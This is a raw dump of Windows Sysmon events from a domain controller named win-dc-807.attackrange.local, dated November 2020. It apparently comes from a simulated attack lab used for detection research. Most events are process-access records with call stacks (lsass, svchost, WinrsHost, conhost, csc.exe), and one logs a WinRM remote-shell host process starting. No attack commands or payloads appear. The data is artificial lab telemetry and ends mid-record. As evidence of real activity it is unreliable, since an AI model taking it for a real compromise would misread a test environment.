15:52:44.239{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004073Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004072Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.239{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004071Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.224{D28789B6-7C64-5FA1-1500-000000008801}13361724C:\Windows\system32\svchost.exe{D28789B6-7CCC-5FA1-C700-000000008801}4708C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000004070Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.224{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CCC-5FA1-C700-000000008801}4708C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004069Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.208{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CCC-5FA1-C700-000000008801}4708C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004068Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.208{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CCC-5FA1-C800-000000008801}3100C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004067Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.208{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004066Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.208{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004065Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.208{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004064Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.208{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004063Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.208{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004062Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.208{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004061Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.208{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004060Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.208{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004059Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.208{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004058Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.208{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7CCC-5FA1-C700-000000008801}4708C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004057Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.208{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CCC-5FA1-C700-000000008801}4708C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004056Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.210{D28789B6-7CCC-5FA1-C700-000000008801}4708C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7CCC-5FA1-4F36-080000000000}0x8364f0HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000004055Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.208{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004054Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.208{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004053Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:44.192{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004230Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.976{D28789B6-7CCC-5FA1-C800-000000008801}31001104C:\Windows\system32\conhost.exe{D28789B6-7CCD-5FA1-D200-000000008801}788C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004229Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.976{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004228Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.976{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004227Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:45.976{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004226Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 